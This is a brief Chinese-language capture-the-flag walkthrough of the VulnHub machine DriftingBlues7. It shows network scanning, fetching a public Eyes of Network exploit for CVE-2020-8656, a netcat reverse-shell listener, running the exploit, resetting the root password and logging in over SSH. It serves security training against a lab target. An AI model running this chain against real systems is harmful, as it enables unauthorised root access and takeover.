vulnhub靶机:driftingblues7
一:信息收集
1:主机发现
arp-scan -I eth0 10.9.23.0/24

kali的ip:10.9.23.112
靶机ip:10.9.23.93
2:端口扫描
nmap -A -p- -T4 10.9.23.93

开放了22,66,80,443,3306端口
3:端口探测
访问66端口,因为是上面运行了SimpleHttpServer

访问80端口,发现一个登录界面,来百度搜索Eyes of network发现可以利用的exp

漏洞编号
CVE-2020-8656

找到一个可以利用的漏洞克隆到kali
https://github.com/h4knet/eonrce
git clone https://github.com/h4knet/eonrce.git

二:渗透测试
赋予执行权限
chmod +x eonrce.py
在Kali 开启监听
nc -lvvp 6666
运行脚本:
./eonrce.py https://10.9.23.93 -ip 10.9.23.112 -port 6666
修改root的密码passwd root

由之前扫描发现开了ssh服务,我们用 ssh 连接靶机
ssh 10.9.23.93

发现最后flag

浙公网安备 33010602011771号